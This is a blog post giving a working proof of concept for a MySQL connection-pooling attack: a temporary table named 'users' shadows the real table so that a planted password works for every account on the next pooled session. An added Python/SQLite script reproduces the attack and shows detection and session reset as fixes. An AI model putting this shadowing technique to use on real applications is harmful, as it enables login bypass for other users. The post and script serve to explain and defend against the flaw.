Morgan Tocker @ 2007-12-15 15:11:00
Entry tags: mysql, php
Proof-of-concept attack when using connection pooling.
mysql> create database attack;
Query OK, 1 row affected (0.00 sec)
mysql> use attack;
Database changed
mysql> create table users (id INT UNSIGNED NOT NULL PRIMARY KEY auto_increment, username varchar(30) NOT NULL,
password char(32) NOT NULL, UNIQUE KEY (username));
Query OK, 0 rows affected (0.00 sec)
mysql> INSERT into users (username, password) VALUES ('morgo', MD5('my_password')),
('ted', MD5('another_password'));
Query OK, 2 rows affected (0.41 sec)
Records: 2 Duplicates: 0 Warnings: 0
mysql> SELECT * FROM users;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | morgo    | a865a7e0ddbf35fa6f6a232e0893bea4 |
|  2 | ted      | 280fb9194368f9d1d44f8ddcc13f2717 |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)
mysql> CREATE TEMPORARY TABLE users_copy LIKE users;
Query OK, 0 rows affected (0.04 sec)
mysql> INSERT into users_copy SELECT id, username, md5('anything') FROM users;
Query OK, 2 rows affected (0.00 sec)
Records: 2 Duplicates: 0 Warnings: 0
mysql> CREATE TEMPORARY TABLE users LIKE users_copy;
Query OK, 0 rows affected (0.01 sec)
mysql> INSERT INTO users SELECT * FROM users_copy;
Query OK, 2 rows affected (0.00 sec)
Records: 2 Duplicates: 0 Warnings: 0
mysql> SELECT * FROM users;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | morgo    | f0e166dc34d14d6c228ffac576c9a43c |
|  2 | ted      | f0e166dc34d14d6c228ffac576c9a43c |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)
Notice the subtle attack? It's a documented feature that you can have a temporary table with the same name as a base table, and the temporary table takes precedence for unqualified references.
Normally this isn't a problem, because a temporary table is only visible in the session that created it and is dropped when that session ends. With connection pooling, though, the session does not end when your request does: the same connection, temporary tables and all, is handed to the next person, who may not get the table they expected.
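The following is an added example, not code from the original post. It reproduces the shadowing on a pooled connection and shows the two things a defender wants from a pool: a way to detect a base table hidden behind a temporary one, and a reset of session state before a connection is reused. SQLite is used as a stand-in so the script runs offline; like MySQL it allows a TEMP table with the same name as a base table and resolves unqualified names to the TEMP one first. The pool, the `reset_session` helper, the `users` rows and the MD5 scheme are all constructed here to mirror the post; for a real MySQL pool the equivalent of `reset_session` is a connection reset (`mysqli_change_user()` in PHP, or the server's reset-connection command), and `SHOW CREATE TABLE users` printing `CREATE TEMPORARY TABLE` is the MySQL-side sign that the base table is shadowed.

```python
"""Temporary-table shadowing across a pooled connection, with detection and reset.

SQLite stands in for MySQL so this runs offline (assumption: same shadowing rule,
which both engines document). Everything below is constructed for illustration.
"""
import hashlib
import os
import shutil
import sqlite3
import tempfile


def md5(text: str) -> str:
    # The post stores MD5(password); mirrored here, not a recommendation.
    return hashlib.md5(text.encode()).hexdigest()


def create_database(path: str) -> None:
    # Base table and the two constructed rows from the post.
    conn = sqlite3.connect(path)
    with conn:
        conn.execute(
            "CREATE TABLE users (id INTEGER PRIMARY KEY, "
            "username TEXT NOT NULL UNIQUE, password TEXT NOT NULL)"
        )
        conn.executemany(
            "INSERT INTO users (username, password) VALUES (?, ?)",
            [("morgo", md5("my_password")), ("ted", md5("another_password"))],
        )
    conn.close()


def shadowed_base_tables(conn: sqlite3.Connection) -> list:
    """Detection: base tables that a TEMP table of the same name now hides.
    (MySQL equivalent: SHOW CREATE TABLE reporting CREATE TEMPORARY TABLE.)"""
    rows = conn.execute(
        "SELECT name FROM sqlite_temp_master WHERE type = 'table' "
        "AND name IN (SELECT name FROM main.sqlite_master WHERE type = 'table')"
    ).fetchall()
    return [name for (name,) in rows]


def reset_session(conn: sqlite3.Connection) -> None:
    """Mitigation: clear per-session state before the connection is reused.
    A real pool issues a protocol-level reset instead of dropping tables by hand."""
    names = conn.execute(
        "SELECT name FROM sqlite_temp_master WHERE type = 'table'"
    ).fetchall()
    for (name,) in names:
        conn.execute(f'DROP TABLE temp."{name}"')


class Pool:
    """A one-connection pool: every checkout hands back the same session."""

    def __init__(self, path: str, reset_on_checkout: bool) -> None:
        self._conn = sqlite3.connect(path)
        self._reset = reset_on_checkout

    def checkout(self) -> sqlite3.Connection:
        if self._reset:
            reset_session(self._conn)
        return self._conn


def shadow_users(conn: sqlite3.Connection) -> None:
    # The sequence from the post: a TEMP copy of users with a known password,
    # then a TEMP table named users so unqualified queries hit the copy.
    conn.execute("CREATE TEMP TABLE users_copy (id INTEGER PRIMARY KEY, "
                 "username TEXT, password TEXT)")
    conn.execute("INSERT INTO users_copy SELECT id, username, ? FROM users",
                 (md5("anything"),))
    conn.execute("CREATE TEMP TABLE users (id INTEGER PRIMARY KEY, "
                 "username TEXT, password TEXT)")
    conn.execute("INSERT INTO users SELECT * FROM users_copy")


def check_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    row = conn.execute("SELECT password FROM users WHERE username = ?",
                       (username,)).fetchone()
    return row is not None and row[0] == md5(password)


def run(reset_on_checkout: bool) -> dict:
    """First checkout plants the shadow table; second checkout is the next user."""
    tmpdir = tempfile.mkdtemp()
    path = os.path.join(tmpdir, "attack.db")
    create_database(path)
    pool = Pool(path, reset_on_checkout)
    shadow_users(pool.checkout())
    conn = pool.checkout()
    result = {
        "shadowed": shadowed_base_tables(conn),
        "anything_works": check_login(conn, "ted", "anything"),
        "real_works": check_login(conn, "ted", "another_password"),
    }
    conn.close()
    shutil.rmtree(tmpdir)
    return result


if __name__ == "__main__":
    print("no reset:  ", run(reset_on_checkout=False))
    print("with reset:", run(reset_on_checkout=True))
```

Without the reset the second checkout finds `users` shadowed, the planted password logs in and the real one does not; with the reset the base table is back and only the real password works. The detection query is cheap enough to run as a pool health check, but it only catches the case after the fact; resetting session state on every checkout is what actually closes the hole.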